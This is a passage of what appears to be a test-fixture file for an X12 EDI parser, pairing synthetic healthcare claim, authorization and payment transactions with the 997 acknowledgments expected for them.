AK2*837*1179~
AK3*LX*385**4~
AK3*LX*392**4~
AK3*LX*399**4~
AK3*LX*406**4~
AK5*R*5~
AK9*R*1*1*0~
SE*10*0001~
GE*1*1167~
TA1*000001168*041105*1526*A*000~
IEA*1*412100057~""",
'source': """ISA*00* *00* *ZZ*AAAAAAAA *ZZ*BBBBBBBBB *041105*1526*U*00401*000001168*1*P*:~
GS*HC*AAAA*BBBBBBBBB*20041105*1526*1167*X*004010X098A1~
ST*837*1179~
BHT*0019*00*AAAA1179*20041105*1526*RP~
REF*87*004010X098A1~
NM1*41*2*Sender 1*****46*99999~
PER*IC*SUPPORT*EM*Support@dev.null*TE*8005553333~
NM1*40*2*Receiver 1*****46*8888888~
HL*1**20*1~
NM1*85*2*Sender 1*****24*999999999~
N3*399 ELM ROAD~
N4*Kalamazoo*MI*49001~
REF*1D*333402169~
HL*2*1*22*0~
SBR*P*18*******MC~
NM1*IL*1*THE FIFTH*RICHARD****MI*1212121~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
DMG*D8*19051104*M~
NM1*PR*2*PAYER 1*****PI*8888888~
CLM*3215338*21***12::1*Y*A*Y*A*B~
CN1*05~
HI*BK:317~
NM1*82*2*PROVIDER 1*****24*222185735~
PRV*PE*ZZ*103T00000X~
SBR*P*18***MC****MC~
AMT*B6*0~
DMG*D8*19051104*M~
OI***Y*B**I~
NM1*IL*1*THE FIFTH*RICHARD****MI*0000000004~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
REF*SY*777777777~
NM1*PR*2*Sender 1S*****PI*12128909~
REF*F8*3215338~
REF*G1*121282~
LX*1~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040407~
REF*6R*1057296~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*2~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040414~
REF*6R*1057297~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*3~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040421~
REF*6R*1057298~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*4~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*5~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*6~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*7~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*8~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*9~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*10~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*11~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*12~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*13~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*14~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*15~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*16~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*17~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*18~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*19~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*20~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*21~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*22~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*23~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*24~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*25~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*26~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*27~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*28~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*29~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*30~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*31~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*32~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*33~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*34~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*35~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*36~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*37~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*38~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*39~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*40~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*41~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*42~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*43~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*44~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*45~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*46~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*47~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*48~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*49~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*50~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*51~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*52~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*53~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*54~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
SE*413*1179~
GE*1*1167~
IEA*1*000001168~"""
},
'loop_counting2':
{
'res997': """ISA*00* *00* *ZZ*BBBBBBBBB *ZZ*AAAAAAAA *120718*1046*U*00401*207181046*1*P*:~
GS*FA*BBBBBBBBB*AAAA*20120718*104632*1167*X*004010~
ST*997*0001~
AK1*HC*1167~
AK2*837*1179~
AK3*LX*385**4~
AK3*LX*392**4~
AK3*LX*399**4~
AK3*LX*406**4~
AK5*R*5~
AK9*R*1*1*0~
SE*10*0001~
GE*1*1167~
TA1*000001168*041105*1526*A*000~
IEA*1*207181046~""",
'source': """ISA*00* *00* *ZZ*AAAAAAAA *ZZ*BBBBBBBBB *041105*1526*U*00401*000001168*1*P*:~
GS*HC*AAAA*BBBBBBBBB*20041105*1526*1167*X*004010X098A1~
ST*837*1179~
BHT*0019*00*AAAA1179*20041105*1526*RP~
REF*87*004010X098A1~
NM1*41*2*Sender 1*****46*99999~
PER*IC*SUPPORT*EM*Support@dev.null*TE*8005553333~
NM1*40*2*Receiver 1*****46*8888888~
HL*1**20*1~
NM1*85*2*Sender 1*****24*999999999~
N3*399 ELM ROAD~
N4*Kalamazoo*MI*49001~
REF*1D*333402169~
HL*2*1*22*0~
SBR*P*18*******MC~
NM1*IL*1*THE FIFTH*RICHARD****MI*1212121~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
DMG*D8*19051104*M~
NM1*PR*2*PAYER 1*****PI*8888888~
CLM*3215338*21***12::1*Y*A*Y*A*B~
CN1*05~
HI*BK:317~
NM1*82*2*PROVIDER 1*****24*222185735~
PRV*PE*ZZ*103T00000X~
SBR*P*18***MC****MC~
AMT*B6*0~
DMG*D8*19051104*M~
OI***Y*B**I~
NM1*IL*1*THE FIFTH*RICHARD****MI*0000000004~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
REF*SY*777777777~
NM1*PR*2*Sender 1S*****PI*12128909~
REF*F8*3215338~
REF*G1*121282~
LX*1~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040407~
REF*6R*1057296~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*2~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040414~
REF*6R*1057297~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*3~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040421~
REF*6R*1057298~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*4~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*5~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*6~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*7~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*8~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*9~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*10~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*11~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*12~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*13~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*14~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*15~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*16~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*17~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*18~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*19~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*20~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*21~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*22~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*23~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*24~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*25~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*26~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*27~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*28~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*29~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*30~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*31~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*32~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*33~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*34~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*35~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*36~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*37~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*38~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*39~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*40~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*41~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*42~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*43~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*44~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*45~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*46~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*47~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*48~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*49~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*50~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*51~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*52~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*53~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*54~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
SE*413*1179~
GE*1*1167~
IEA*1*000001168~"""
},
'multiple_trn': {
'res997': """ISA*00* *00* *ZZ*ZZ001 *ZZ*ZZ000 *050807*0207*U*00401*508070207*0*T*:~
GS*FA*00GR*D00111*20050807*020749*383880001*X*004010~
ST*997*0001~
AK1*HI*17~
AK2*278*11280001~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280002~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280003~
AK3*HL*2**3~
AK5*R*5~
AK9*R*3*3*0~
SE*13*0001~
ST*997*0002~
AK1*HC*18~
AK2*837*11280001~
AK3*REF*2**3~
AK3*NM1*2**3~
AK3*NM1*2**3~
AK3*HL*2**3~
AK5*R*5~
AK9*R*1*1*0~
SE*10*0002~
ST*997*0003~
AK1*HP*383880001~
AK2*835*0001~
AK3*BPR*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0003~
GE*3*383880001~
IEA*1*508070207~""",
'source': """ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010121*0*T*:~
GS*HI*ZZ000*ZZ001*20030828*1128*17*X*004010X094A1~
ST*278*11280001~
BHT*0078*11*121231*20050802*1202~
SE*3*11280001~
ST*278*11280002~
BHT*0078*13*121231*20050802*1202~
SE*3*11280002~
ST*278*11280003~
BHT*0078*11*121231*20050802*1202~
SE*3*11280003~
GE*3*17~
GS*HC*ZZ000*ZZ001*20030828*1128*18*X*004010X098A1~
ST*837*11280001~
BHT*0019*00*121231*20050802*1202*CH~
SE*3*11280001~
GE*1*18~
GS*HP*D00111*00GR*20041028*1609*383880001*X*004010X091A1~
ST*835*0001~
SE*2*0001~
GE*1*383880001~
IEA*3*000010121~"""
},
'ordinal': {
'res997': """ISA*00* *00* *ZZ*0000BBB *ZZ*00000AAA *040809*1625*U*00401*408091625*0*P*:~
GS*FA*0BBB*0AAA*20040809*162519*1*X*004010~
ST*997*0001~
AK1*HC*1~
AK2*837*300145997~
AK5*A~
AK9*A*1*1*1~
SE*6*0001~
GE*1*1~
IEA*1*408091625~""",
'source': """ISA*00* *00* *ZZ*00000AAA *ZZ*0000BBB *040709*1439*U*00401*000484889*0*P*:~
GS*HC*0AAA*0BBB*20040709*1439*1*X*004010X096A1~
ST*837*300145997~
BHT*0019*00*300145997*20040709*1439*RP~
REF*87*004010X096A1~
NM1*41*2*PROVIDER 1*****46*0AAA~
PER*IC*HELPDESK*EM*ADMIN@NULL.NULL*TE*8005557444~
NM1*40*2*RECEIVER 1*****46*000111~
HL*1**20*1~
NM1*85*2*PROVIDER 1*****24*555112222~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
REF*1D*1705555~
HL*2*1*22*0~
SBR*S*18*******11~
NM1*IL*1*ARNOLD*TOM****MI*666333444~
N3*5324 ELM~
N4*STURGIS*MI*49091~
DMG*D8*19270312*M~
REF*SY*666333444~
NM1*PR*2*PAYER 2*****PI*000111~
N3*PO BOX 0000~
N4*KALAMAZOO*MI*48001~
CLM*12522228*0***11:A:7*Y*A*Y*A*********N~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
SBR*T*18**PAYER A*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PAYER A*****PI*552312313~
DTP*573*D8*20040210~
REF*F8*1253278~
SBR*P*18**PROVIDER 1*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PROVIDER 1*****PI*13256235~
